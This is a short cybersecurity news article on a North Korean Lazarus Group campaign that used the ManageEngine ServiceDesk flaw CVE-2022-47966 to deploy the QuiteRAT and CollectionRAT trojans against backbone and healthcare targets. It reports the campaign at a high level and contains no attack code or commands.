North Korean Lazarus APT Group Targets Internet Backbone and Healthcare Organizations in Europe and the US
In a fresh cyber attack, the Lazarus APT group, backed by the North Korean state, has set its sights on internet backbone infrastructure and healthcare organizations located in Europe and the United States. According to a report by Cisco Talos, the hackers exploited a vulnerability in ManageEngine ServiceDesk (CVE-2022-47966) as early as January, only five days after its disclosure.
The attack began by utilizing the vulnerability to gain initial access. This allowed the hackers to download and run a malicious binary through the Java runtime process, which then initiated the implant on the compromised server. The binary used in the attack is a modified version of Lazarus Group’s MagicRAT malware, now known as QuiteRAT.
As part of this campaign, the Lazarus Group APT has also introduced a new malware named CollectionRAT. It functions as a remote access trojan (RAT) capable of executing arbitrary commands on compromised systems. Security researchers have discovered a connection between CollectionRAT and Jupiter/EarlyRAT, a previously known malicious software associated with the Andariel APT faction, which operates under the Lazarus Group.
Similar to MagicRAT, QuiteRAT is constructed using the Qt framework, an open-source, cross-platform framework for application development. However, QuiteRAT has a significantly smaller file size ranging from 4 to 5MB compared to MagicRAT’s 18MB. This size difference is due to the Lazarus Group’s decision to include only essential Qt libraries in QuiteRAT, unlike MagicRAT, which incorporated the entire framework.
While MagicRAT has built-in persistence mechanisms through the configuration of scheduled tasks, QuiteRAT lacks inherent persistence functionality. Instead, it relies on instructions from the command-and-control (C2) server for persistence.
This marks the third documented campaign attributed to the Lazarus Group in the early months of 2023. What’s interesting is that the group has consistently repurposed the same infrastructure for these operations. Cybersecurity teams are advised to monitor and analyze the threat to prevent infection from QuiteRAT.